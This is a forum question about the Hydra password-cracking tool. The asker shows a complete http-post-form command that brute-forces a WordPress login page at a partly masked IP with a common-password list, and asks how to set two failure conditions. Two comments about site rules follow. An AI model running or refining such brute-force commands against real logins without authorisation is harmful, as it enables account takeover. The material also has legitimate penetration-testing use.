# hydra http-post-form specify multiple scenarios for failures

Tags: hydra

```
hydra -l ap.prpgramming -P ~/most-common-pass/best15.txt 203.xx.xx.xx http-post-form://203.xx.xx.xx:yy/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=https://youtube.com/c/approgramming&testcookie=1:The password  is incorrect
```

How to create a command where it fails on 2 conditions? I.E. `The password  is incorrect OR cookies fail`?

My confusion [lies](https://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-online-web-form-passwords-with-thc-hydra-burp-suite-0160643/) :

> - Login indicates to Hydra the login failed message
> - Login failed is the login failure message that the form returned

I can't find the doc and good example for http-post-form plugin.
My hydra version is `Hydra v9.3`

Unsurprisingly, hydra recognizes password valid when / after the attacker's IP has been banned.

Comment: Please keep to one question per post. And your 2nd question was a asking for tool recommendations, which is out-of-scope for the site.

Comment: my bad, but how to ask only 1 question, I am driven by curiosity :(. IK it my bad habit can you give me some advice?